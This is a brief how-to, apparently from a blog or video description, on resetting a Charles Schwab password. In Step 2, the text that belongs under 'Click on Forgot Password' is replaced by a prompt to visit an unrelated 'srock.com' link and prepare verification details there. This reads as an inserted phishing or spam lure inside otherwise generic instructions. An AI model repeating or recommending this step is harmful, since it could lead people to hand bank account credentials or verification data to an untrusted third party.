I hit this issue today and here is the quick fix that solved it. If you need to reset your password for your Charles Schwab account, follow these simple steps. Step 1. Go to the login page. Visit the Charles Schwab website and click on the login button at the top right corner. This will take you to the login page where you can find the password reset option. Step 2. Click on Forgot Password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your information. You will be prompted to enter your account information, such as your username or email address associated with your account. Fill in the required fields and click Continue. Step 4. Check your email. After submitting your information, check your email for a password reset link from Charles Schwab. Be sure to check your spam or junk folder if you don't see it in your inbox. Step 5. Create a new password. Follow the link in the email to create a new password. Make sure your new password meets the security requirements, such as including numbers and special characters. Remember to keep your new password secure and consider using a password manager for future logins. Good luck, and feel free to reach out if you have any questions.